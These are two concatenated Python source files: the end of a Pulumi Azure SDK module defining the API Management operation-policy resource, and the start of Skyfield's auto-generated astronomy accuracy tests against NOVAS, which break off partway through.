:param pulumi.Input[str] api_name: The ID of the API Management API Operation within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] operation_id: The operation identifier within an API. Must be unique in the current API Management service instance.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] xml_content: The XML Content for this Policy.
:param pulumi.Input[str] xml_link: A link to a Policy XML Document, which must be publicly available.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ApiOperationPolicyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an API Management API Operation Policy
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_api_operation = azure.apimanagement.ApiOperation("exampleApiOperation")
#...
example_api_operation_policy = azure.apimanagement.ApiOperationPolicy("exampleApiOperationPolicy",
api_name=example_api_operation.api_name,
api_management_name=example_api_operation.api_management_name,
resource_group_name=example_api_operation.resource_group_name,
operation_id=example_api_operation.operation_id,
xml_content=\"\"\"<policies>
<inbound>
<find-and-replace from="xyz" to="abc" />
</inbound>
</policies>
\"\"\")
```
## Import
API Management API Operation Policy can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/apiOperationPolicy:ApiOperationPolicy example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/instance1/apis/api1/operations/operation1/policies/policy
```
:param str resource_name: The name of the resource.
:param ApiOperationPolicyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApiOperationPolicyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
api_name: Optional[pulumi.Input[str]] = None,
operation_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
xml_content: Optional[pulumi.Input[str]] = None,
xml_link: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApiOperationPolicyArgs.__new__(ApiOperationPolicyArgs)
if api_management_name is None and not opts.urn:
raise TypeError("Missing required property 'api_management_name'")
__props__.__dict__["api_management_name"] = api_management_name
if api_name is None and not opts.urn:
raise TypeError("Missing required property 'api_name'")
__props__.__dict__["api_name"] = api_name
if operation_id is None and not opts.urn:
raise TypeError("Missing required property 'operation_id'")
__props__.__dict__["operation_id"] = operation_id
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["xml_content"] = xml_content
__props__.__dict__["xml_link"] = xml_link
super(ApiOperationPolicy, __self__).__init__(
'azure:apimanagement/apiOperationPolicy:ApiOperationPolicy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
api_name: Optional[pulumi.Input[str]] = None,
operation_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
xml_content: Optional[pulumi.Input[str]] = None,
xml_link: Optional[pulumi.Input[str]] = None) -> 'ApiOperationPolicy':
"""
Get an existing ApiOperationPolicy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The ID of the API Management API Operation within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] operation_id: The operation identifier within an API. Must be unique in the current API Management service instance.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] xml_content: The XML Content for this Policy.
:param pulumi.Input[str] xml_link: A link to a Policy XML Document, which must be publicly available.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ApiOperationPolicyState.__new__(_ApiOperationPolicyState)
__props__.__dict__["api_management_name"] = api_management_name
__props__.__dict__["api_name"] = api_name
__props__.__dict__["operation_id"] = operation_id
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["xml_content"] = xml_content
__props__.__dict__["xml_link"] = xml_link
return ApiOperationPolicy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> pulumi.Output[str]:
"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@property
@pulumi.getter(name="apiName")
def api_name(self) -> pulumi.Output[str]:
"""
The ID of the API Management API Operation within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_name")
@property
@pulumi.getter(name="operationId")
def operation_id(self) -> pulumi.Output[str]:
"""
The operation identifier within an API. Must be unique in the current API Management service instance.
"""
return pulumi.get(self, "operation_id")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="xmlContent")
def xml_content(self) -> pulumi.Output[str]:
"""
The XML Content for this Policy.
"""
return pulumi.get(self, "xml_content")
@property
@pulumi.getter(name="xmlLink")
def xml_link(self) -> pulumi.Output[Optional[str]]:
"""
A link to a Policy XML Document, which must be publicly available.
"""
return pulumi.get(self, "xml_link")
[flattened numeric statistics and quality-signal columns for the preceding record omitted]

hexsha: 54439e747a1a5b637708a3b51fa9a3daedbdd519 | size: 134,477 | ext: py | lang: Python
path: skyfield/tests/test_against_novas.py
repo: aarose/python-skyfield @ a6c56247d1a888f57fc442530948779cec5c1db1
licenses: ["MIT"]
stars/issues/forks: null
content:
'Auto-generated accuracy tests vs NOVAS (see build_novas_tests.py).'
from numpy import abs, array, einsum, max
from skyfield import (earthlib, framelib, nutationlib, positionlib,
precessionlib, starlib, timelib)
from skyfield.api import JulianDate
from skyfield.constants import AU_KM, AU_M
from skyfield.data import hipparcos
from skyfield.functions import length_of
from skyfield.jpllib import Ephemeris
import de405
de405 = Ephemeris(de405)
OLD_AU = AU_KM / de405.jplephemeris.AU
one_second = 1.0 / 24.0 / 60.0 / 60.0
arcsecond = 1.0 / 60.0 / 60.0
ra_arcsecond = 24.0 / 360.0 / 60.0 / 60.0
meter = 1.0 / AU_M
def compare(value, expected_value, epsilon):
if hasattr(value, 'shape') or hasattr(expected_value, 'shape'):
assert max(abs(value - expected_value)) <= epsilon
else:
assert abs(value - expected_value) <= epsilon
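# Illustrative only (not part of the auto-generated suite): `compare` accepts either
# scalars or arrays, reducing arrays with max(abs(...)) before the tolerance check.
def _compare_examples():
    compare(1.0, 1.0000005, 1e-6)                                  # scalar path
    compare(array([1.0, 2.0]), array([1.0, 2.0 + 1e-7]), 1e-6)     # array path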
def test_calendar_date_0():
compare(timelib.calendar_date(2440423.345833333), array((1969, 7, 20.345833333209157)), 0.0)
def test_calendar_date_1():
compare(timelib.calendar_date(2448031.5), array((1990, 5, 19.5)), 0.0)
def test_calendar_date_2():
compare(timelib.calendar_date(2451545.0), array((2000, 1, 1.0)), 0.0)
def test_calendar_date_3():
compare(timelib.calendar_date(2456164.5), array((2012, 8, 24.5)), 0.0)
def test_earth_rotation_angle_date0():
compare(earthlib.earth_rotation_angle(2440423.345833333) * 360.0, 243.3216078027496,
0.000001 * arcsecond)
def test_earth_rotation_angle_date1():
compare(earthlib.earth_rotation_angle(2448031.5) * 360.0, 237.5118441792128,
0.000001 * arcsecond)
def test_earth_rotation_angle_date2():
compare(earthlib.earth_rotation_angle(2451545.0) * 360.0, 280.46061837504,
0.000001 * arcsecond)
def test_earth_rotation_angle_date3():
compare(earthlib.earth_rotation_angle(2456164.5) * 360.0, 333.4965831957672,
0.000001 * arcsecond)
def test_earth_tilt_date0():
compare(nutationlib.earth_tilt(JulianDate(tdb=2440423.345833333)),
array((23.443240959852666, 23.445702723464045, 0.15929455696954214, 2.604727521416375, 8.862349000962691)), 0.00001 * arcsecond)
def test_earth_tilt_date1():
compare(nutationlib.earth_tilt(JulianDate(tdb=2448031.5)),
array((23.440530953006782, 23.442178709915066, 0.7110982205507752, 11.628148141964171, 5.931924869819427)), 0.00001 * arcsecond)
def test_earth_tilt_date2():
compare(nutationlib.earth_tilt(JulianDate(tdb=2451545.0)),
array((23.439279444444445, 23.437676833867652, -0.852016747090803, -13.931996330960066, -5.769398076465291)), 0.00001 * arcsecond)
def test_earth_tilt_date3():
compare(nutationlib.earth_tilt(JulianDate(tdb=2456164.5)),
array((23.43763397776759, 23.43645066577372, 0.977087608170215, 15.976729533480038, -4.259923177932873)), 0.00001 * arcsecond)
def test_equation_of_the_equinoxes_complimentary_terms_date0():
compare(nutationlib.equation_of_the_equinoxes_complimentary_terms(2440423.345833333),
array(-1.4592438843164885e-09), 0.0000000000000001 * arcsecond)
def test_equation_of_the_equinoxes_complimentary_terms_date1():
compare(nutationlib.equation_of_the_equinoxes_complimentary_terms(2448031.5),
array(-9.909270679336256e-09), 0.0000000000000001 * arcsecond)
def test_equation_of_the_equinoxes_complimentary_terms_date2():
compare(nutationlib.equation_of_the_equinoxes_complimentary_terms(2451545.0),
array(1.021330096302465e-08), 0.0000000000000001 * arcsecond)
def test_equation_of_the_equinoxes_complimentary_terms_date3():
compare(nutationlib.equation_of_the_equinoxes_complimentary_terms(2456164.5),
array(-1.082315527387237e-08), 0.0000000000000001 * arcsecond)
def test_forward_frame_tie():
compare(framelib.ICRS_to_J2000.dot((1.1, 1.2, 1.3)), (1.100000019790573, 1.2000001208396125, 1.2999998717098593), 1e-15)
def test_reverse_frame_tie():
compare(framelib.ICRS_to_J2000.T.dot((1.1, 1.2, 1.3)), (1.0999999802094143, 1.1999998791603803, 1.300000128290131), 1e-15)
def test_fundamental_arguments_date0():
compare(nutationlib.fundamental_arguments(-0.3044942961441969),
array((-1.559784616935014, -2.8619278194907483, -2.7748368269156427, -4.947060102171707, 6.178085194718492)), 0.000000002 * arcsecond)
def test_fundamental_arguments_date1():
compare(nutationlib.fundamental_arguments(-0.09619438740588637),
array((-0.8532784044768771, -3.933579124091533, -5.376486844354831, -0.9485312704748627, 5.429677887938805)), 0.000000002 * arcsecond)
def test_fundamental_arguments_date2():
compare(nutationlib.fundamental_arguments(0.0),
array((2.355555743493879, 6.24006012692298, 1.6279050815375191, 5.198466588650503, 2.182439196615671)), 0.000000002 * arcsecond)
def test_fundamental_arguments_date3():
compare(nutationlib.fundamental_arguments(0.12647501711156742),
array((0.15181719486225662, 4.023151622222436, 0.10917837795937814, 1.6234303368860354, -2.086983188457769)), 0.000000002 * arcsecond)
def test_iau2000a_date0():
compare(nutationlib.iau2000a(2440423.345833333),
array([26047275.214163747, 88623490.00962691]), 0.001)
def test_iau2000a_date1():
compare(nutationlib.iau2000a(2448031.5),
array([116281481.4196417, 59319248.69819427]), 0.001)
def test_iau2000a_date2():
compare(nutationlib.iau2000a(2451545.0),
array([-139319963.30960065, -57693980.764652915]), 0.001)
def test_iau2000a_date3():
compare(nutationlib.iau2000a(2456164.5),
array([159767295.3348004, -42599231.779328726]), 0.001)
def test_julian_date_function_date0():
compare(timelib.julian_date(-4712, 1, 1, 0.0), 37.5, 0.0)
def test_julian_date_function_date1():
compare(timelib.julian_date(-4712, 3, 1, 0.0), 97.5, 0.0)
def test_julian_date_function_date2():
compare(timelib.julian_date(-4712, 12, 31, 0.5), 402.5208333333333, 0.0)
def test_julian_date_function_date3():
compare(timelib.julian_date(-241, 3, 25, 19.0), 1633120.2916666667, 0.0)
def test_julian_date_function_date4():
compare(timelib.julian_date(530, 9, 27, 23.5), 1914908.4791666667, 0.0)
def test_julian_date_function_date5():
compare(timelib.julian_date(1976, 3, 7, 12.5), 2442845.0208333335, 0.0)
def test_julian_date_function_date6():
compare(timelib.julian_date(2000, 1, 1, 0.0), 2451544.5, 0.0)
def test_mean_obliquity_date0():
compare(nutationlib.mean_obliquity(2440423.345833333),
84395.6674554696, 0.0) # arcseconds
def test_mean_obliquity_date1():
compare(nutationlib.mean_obliquity(2448031.5),
84385.91143082442, 0.0) # arcseconds
def test_mean_obliquity_date2():
compare(nutationlib.mean_obliquity(2451545.0),
84381.406, 0.0) # arcseconds
def test_mean_obliquity_date3():
compare(nutationlib.mean_obliquity(2456164.5),
84375.48231996332, 0.0) # arcseconds
def test_nutation_date0():
matrix = nutationlib.compute_nutation(JulianDate(tdb=2440423.345833333))
result = einsum('ij...,j...->i...', matrix, [1.1, 1.2, 1.3])
compare((1.0999795659425045, 1.1999568871469584, 1.3000570847072532),
result, 1e-14)
def test_nutation_date1():
matrix = nutationlib.compute_nutation(JulianDate(tdb=2448031.5))
result = einsum('ij...,j...->i...', matrix, [1.1, 1.2, 1.3])
compare((1.0999087778623433, 1.2000195046911977, 1.300059178938428),
result, 1e-14)
def test_nutation_date2():
matrix = nutationlib.compute_nutation(JulianDate(tdb=2451545.0))
result = einsum('ij...,j...->i...', matrix, [1.1, 1.2, 1.3])
compare((1.1001092900321017, 1.1999681897164485, 1.2999368806421698),
result, 1e-14)
def test_nutation_date3():
matrix = nutationlib.compute_nutation(JulianDate(tdb=2456164.5))
result = einsum('ij...,j...->i...', matrix, [1.1, 1.2, 1.3])
compare((1.0998746654010052, 1.2001050177909849, 1.3000091025381042),
result, 1e-14)
def test_precession_date0():
matrix = precessionlib.compute_precession(2440423.345833333)
result = einsum('ij...,j...->i...', matrix, [1.1, 1.2, 1.3])
compare((1.1119856573552391, 1.1924703352076302, 1.296727572578774),
result, 1e-15)
def test_precession_date1():
matrix = precessionlib.compute_precession(2448031.5)
result = einsum('ij...,j...->i...', matrix, [1.1, 1.2, 1.3])
compare((1.1037931405410017, 1.1976299348492718, 1.2989700697273823),
result, 1e-15)
def test_precession_date2():
matrix = precessionlib.compute_precession(2451545.0)
result = einsum('ij...,j...->i...', matrix, [1.1, 1.2, 1.3])
compare((1.1, 1.1999999999999997, 1.2999999999999998),
result, 1e-15)
def test_precession_date3():
matrix = precessionlib.compute_precession(2456164.5)
result = einsum('ij...,j...->i...', matrix, [1.1, 1.2, 1.3])
compare((1.0950034772583117, 1.203103909268923, 1.3013486728367767),
result, 1e-15)
def test_sidereal_time_on_date0():
jd = JulianDate(tt=2440423.345833333)
compare(earthlib.sidereal_time(jd), 16.195436227057314, 1e-13)
def test_sidereal_time_with_nonzero_delta_t_on_date0():
jd = JulianDate(tt=2440423.345833333 + 99.9 * one_second, delta_t=99.9)
compare(earthlib.sidereal_time(jd), 16.195436229760602, 1e-13)
def test_sidereal_time_on_date1():
jd = JulianDate(tt=2448031.5)
compare(earthlib.sidereal_time(jd), 15.825907460288224, 1e-13)
def test_sidereal_time_with_nonzero_delta_t_on_date1():
jd = JulianDate(tt=2448031.5 + 99.9 * one_second, delta_t=99.9)
compare(earthlib.sidereal_time(jd), 15.825907462991848, 1e-13)
def test_sidereal_time_on_date2():
jd = JulianDate(tt=2451545.0)
compare(earthlib.sidereal_time(jd), 18.69737482696563, 1e-13)
def test_sidereal_time_with_nonzero_delta_t_on_date2():
jd = JulianDate(tt=2451545.0 + 99.9 * one_second, delta_t=99.9)
compare(earthlib.sidereal_time(jd), 18.69737482966941, 1e-13)
def test_sidereal_time_on_date3():
jd = JulianDate(tt=2456164.5)
compare(earthlib.sidereal_time(jd), 22.243908497165812, 1e-13)
def test_sidereal_time_with_nonzero_delta_t_on_date3():
jd = JulianDate(tt=2456164.5 + 99.9 * one_second, delta_t=99.9)
compare(earthlib.sidereal_time(jd), 22.2439084998698, 1e-13)
def test_star_vector():
star = starlib.Star(ra_hours=2.530301028, dec_degrees=89.264109444,
ra_mas_per_year=44.22, dec_mas_per_year=-11.75,
parallax_mas=7.56, radial_km_per_s=-17.4)
star.au_km = de405.jplephemeris.AU
star._compute_vectors()
compare(star._position_au,
(276301.52367964364, 215517.39549460335, 27281454.18783122),
1e3 * meter)
compare(star._velocity_au_per_d,
(-0.006595734315371155, 0.015163885823867606, -0.010102577482634966),
1e-3 * meter) # TODO: was 1e-6 before switch to modern au
def test_refraction0():
r = earthlib.refraction(-5, 10, 1010)
compare(r, 0.0, 0.001 * arcsecond)
def test_refraction1():
r = earthlib.refraction(-5, 10, 1013.25)
compare(r, 0.0, 0.001 * arcsecond)
def test_refraction2():
r = earthlib.refraction(-5, 25, 1010)
compare(r, 0.0, 0.001 * arcsecond)
def test_refraction3():
r = earthlib.refraction(-5, 25, 1013.25)
compare(r, 0.0, 0.001 * arcsecond)
def test_refraction4():
r = earthlib.refraction(-1, 10, 1010)
compare(r, 0.8296919418249878, 0.001 * arcsecond)
def test_refraction5():
r = earthlib.refraction(-1, 10, 1013.25)
compare(r, 0.8323617426278902, 0.001 * arcsecond)
def test_refraction6():
r = earthlib.refraction(-1, 25, 1010)
compare(r, 0.7879289246190321, 0.001 * arcsecond)
def test_refraction7():
r = earthlib.refraction(-1, 25, 1013.25)
compare(r, 0.7904643394754796, 0.001 * arcsecond)
def test_refraction8():
r = earthlib.refraction(15, 10, 1010)
compare(r, 0.06056215494995108, 0.001 * arcsecond)
def test_refraction9():
r = earthlib.refraction(15, 10, 1013.25)
compare(r, 0.06075703317132469, 0.001 * arcsecond)
def test_refraction10():
r = earthlib.refraction(15, 25, 1010)
compare(r, 0.057513724331664955, 0.001 * arcsecond)
def test_refraction11():
r = earthlib.refraction(15, 25, 1013.25)
compare(r, 0.057698793246593584, 0.001 * arcsecond)
def test_refraction12():
r = earthlib.refraction(89.95, 10, 1010)
compare(r, 0.0, 0.001 * arcsecond)
def test_refraction13():
r = earthlib.refraction(89.95, 10, 1013.25)
compare(r, 0.0, 0.001 * arcsecond)
def test_refraction14():
r = earthlib.refraction(89.95, 25, 1010)
compare(r, 0.0, 0.001 * arcsecond)
def test_refraction15():
r = earthlib.refraction(89.95, 25, 1013.25)
compare(r, 0.0, 0.001 * arcsecond)
def test_refract0():
alt = earthlib.refract(-90, 10.0, 1010.0)
compare(alt, -90.0, 0.000000001 * arcsecond)
def test_refract1():
alt = earthlib.refract(-2, 10.0, 1010.0)
compare(alt, -2.0, 0.000000001 * arcsecond)
def test_refract2():
alt = earthlib.refract(-1, 10.0, 1010.0)
compare(alt, -0.34540033564054795, 0.000000001 * arcsecond)
def test_refract3():
alt = earthlib.refract(0, 10.0, 1010.0)
compare(alt, 0.4819388815393779, 0.000000001 * arcsecond)
def test_refract4():
alt = earthlib.refract(1, 10.0, 1010.0)
compare(alt, 1.362447444478633, 0.000000001 * arcsecond)
def test_refract5():
alt = earthlib.refract(3, 10.0, 1010.0)
compare(alt, 3.227564692764261, 0.000000001 * arcsecond)
def test_refract6():
alt = earthlib.refract(9, 10.0, 1010.0)
compare(alt, 9.098059272393698, 0.000000001 * arcsecond)
def test_refract7():
alt = earthlib.refract(90, 10.0, 1010.0)
compare(alt, 90.0, 0.000000001 * arcsecond)
def test_from_altaz_0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos(
'38.9215 N', '77.0669 W', elevation_m=92.0)
a = usno(jd).from_altaz(alt_degrees=68.12871390985244, az_degrees=28.979244220884173)
ra, dec, distance = a.radec(epoch=jd)
compare(ra.hours, 12.34, 0.000000001 * arcsecond)
compare(dec.degrees, 56.78, 0.000000001 * arcsecond)
def test_from_altaz_1():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos(
'38.9215 N', '77.0669 W', elevation_m=92.0)
a = usno(jd).from_altaz(alt_degrees=-17.792497521318964, az_degrees=172.51742180816711)
ra, dec, distance = a.radec(epoch=jd)
compare(ra.hours, 12.34, 0.000000001 * arcsecond)
compare(dec.degrees, -67.89, 0.000000001 * arcsecond)
def test_from_altaz_2():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos(
'38.9215 N', '77.0669 W', elevation_m=92.0)
a = usno(jd).from_altaz(alt_degrees=65.8650913573598, az_degrees=34.158756360615946)
ra, dec, distance = a.radec(epoch=jd)
compare(ra.hours, 12.34, 0.000000001 * arcsecond)
compare(dec.degrees, 56.78, 0.000000001 * arcsecond)
def test_from_altaz_3():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos(
'38.9215 N', '77.0669 W', elevation_m=92.0)
a = usno(jd).from_altaz(alt_degrees=-18.43186389552551, az_degrees=170.42969631720953)
ra, dec, distance = a.radec(epoch=jd)
compare(ra.hours, 12.34, 0.000000001 * arcsecond)
compare(dec.degrees, -67.89, 0.000000001 * arcsecond)
def test_from_altaz_4():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos(
'38.9215 N', '77.0669 W', elevation_m=92.0)
a = usno(jd).from_altaz(alt_degrees=68.47898348962792, az_degrees=332.05109419434154)
ra, dec, distance = a.radec(epoch=jd)
compare(ra.hours, 12.34, 0.000000001 * arcsecond)
compare(dec.degrees, 56.78, 0.000000001 * arcsecond)
def test_from_altaz_5():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos(
'38.9215 N', '77.0669 W', elevation_m=92.0)
a = usno(jd).from_altaz(alt_degrees=-17.699091955922242, az_degrees=187.12243108963492)
ra, dec, distance = a.radec(epoch=jd)
compare(ra.hours, 12.34, 0.000000001 * arcsecond)
compare(dec.degrees, -67.89, 0.000000001 * arcsecond)
def test_from_altaz_6():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos(
'38.9215 N', '77.0669 W', elevation_m=92.0)
a = usno(jd).from_altaz(alt_degrees=41.36529829114181, az_degrees=316.19259712235026)
ra, dec, distance = a.radec(epoch=jd)
compare(ra.hours, 12.34, 0.000000001 * arcsecond)
compare(dec.degrees, 56.78, 0.000000001 * arcsecond)
def test_from_altaz_7():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos(
'38.9215 N', '77.0669 W', elevation_m=92.0)
a = usno(jd).from_altaz(alt_degrees=-29.282626410822033, az_degrees=204.1557062303077)
ra, dec, distance = a.radec(epoch=jd)
compare(ra.hours, 12.34, 0.000000001 * arcsecond)
compare(dec.degrees, -67.89, 0.000000001 * arcsecond)
def test_ITRF_to_GCRS_conversion_on_date0():
jd = JulianDate(tt=2440423.345833333, delta_t=39.707)
position = positionlib.ITRF_to_GCRS(jd, [1.1, 1.2, 1.3])
compare(position, (0.5701172053658128, -1.5232987806096392, 1.3017400651201707), 1e-13)
def test_ITRF_to_GCRS_conversion_on_date1():
jd = JulianDate(tt=2448031.5, delta_t=57.1136)
position = positionlib.ITRF_to_GCRS(jd, [1.1, 1.2, 1.3])
compare(position, (0.41362649279562963, -1.5741081933652488, 1.3004216700893525), 1e-13)
def test_ITRF_to_GCRS_conversion_on_date2():
jd = JulianDate(tt=2451545.0, delta_t=63.8285)
position = positionlib.ITRF_to_GCRS(jd, [1.1, 1.2, 1.3])
compare(position, (1.3757008573963405, -0.8702954291925735, 1.3000126987400913), 1e-13)
def test_ITRF_to_GCRS_conversion_on_date3():
jd = JulianDate(tt=2456164.5, delta_t=66.7846)
position = positionlib.ITRF_to_GCRS(jd, [1.1, 1.2, 1.3])
compare(position, (1.5243574049688486, 0.5755748855663746, 1.2980940077752074), 1e-13)
def test_tdb_minus_tt_on_date0():
result = timelib.tdb_minus_tt(2440423.345833333)
compare(result, -0.00046798717637519603, 1e-16)
def test_tdb_minus_tt_on_date1():
result = timelib.tdb_minus_tt(2448031.5)
compare(result, 0.0011585185926349208, 1e-16)
def test_tdb_minus_tt_on_date2():
result = timelib.tdb_minus_tt(2451545.0)
compare(result, -9.575743486095212e-05, 1e-16)
def test_tdb_minus_tt_on_date3():
result = timelib.tdb_minus_tt(2456164.5)
compare(result, -0.001241030165936046, 1e-16)
def test_mercury_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.mercury(jd)).position.au)
compare(distance * OLD_AU, 1.3278115470600746, 0.5 * meter)
astrometric = e.observe(de405.mercury)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 7.905384000977572, 0.001 * ra_arcsecond)
compare(dec.degrees, 22.332364359841474, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 7.904987228126012, 0.001 * ra_arcsecond)
compare(dec.degrees, 22.333433087908823, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 7.874971625095716, 0.001 * ra_arcsecond)
compare(dec.degrees, 22.415970392044656, 0.001 * arcsecond)
def test_mercury_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.mercury(jd)).position.au)
compare(distance * OLD_AU, 0.6507044512046538, 0.5 * meter)
astrometric = e.observe(de405.mercury)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 2.4704717994133576, 0.001 * ra_arcsecond)
compare(dec.degrees, 11.2501328449305, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.4701282535729665, 0.001 * ra_arcsecond)
compare(dec.degrees, 11.248550502940756, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.4616767226464757, 0.001 * ra_arcsecond)
compare(dec.degrees, 11.207785493244957, 0.001 * arcsecond)
def test_mercury_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.mercury(jd)).position.au)
compare(distance * OLD_AU, 1.4155249674526948, 0.5 * meter)
astrometric = e.observe(de405.mercury)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 18.13892977357885, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.42032494108073, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 18.13851035907211, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.420393338459686, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 18.138225455402914, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.418845803732086, 0.001 * arcsecond)
def test_mercury_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.mercury(jd)).position.au)
compare(distance * OLD_AU, 1.1264323486728112, 0.5 * meter)
astrometric = e.observe(de405.mercury)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 9.295934662566733, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.68579742896488, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 9.295575039086721, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.687409731964937, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 9.307566088097714, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.631743449679668, 0.001 * arcsecond)
def test_mercury_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.mercury(jd)).position.au)
compare(distance * OLD_AU, (1.3278115470600746, 0.6507044512046538, 1.4155249674526948, 1.1264323486728112), 0.5 * meter)
astrometric = e.observe(de405.mercury)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (7.905384000977572, 2.4704717994133576, 18.13892977357885, 9.295934662566733), 0.001 * ra_arcsecond)
compare(dec.degrees, (22.332364359841474, 11.2501328449305, -24.42032494108073, 16.68579742896488), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (7.904987228126012, 2.4701282535729665, 18.13851035907211, 9.295575039086721), 0.001 * ra_arcsecond)
compare(dec.degrees, (22.333433087908823, 11.248550502940756, -24.420393338459686, 16.687409731964937), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (7.874971625095716, 2.4616767226464757, 18.138225455402914, 9.307566088097714), 0.001 * ra_arcsecond)
compare(dec.degrees, (22.415970392044656, 11.207785493244957, -24.418845803732086, 16.631743449679668), 0.001 * arcsecond)
def test_venus_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.venus(jd)).position.au)
compare(distance * OLD_AU, 0.9646045654448725, 0.5 * meter)
astrometric = e.observe(de405.venus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 4.966946050917652, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.210417323471006, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 4.966656139420439, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.210145917097474, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 4.93668626355443, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.166644671858105, 0.001 * arcsecond)
def test_venus_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.venus(jd)).position.au)
compare(distance * OLD_AU, 1.0711674186789975, 0.5 * meter)
astrometric = e.observe(de405.venus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 1.161811406279447, 0.001 * ra_arcsecond)
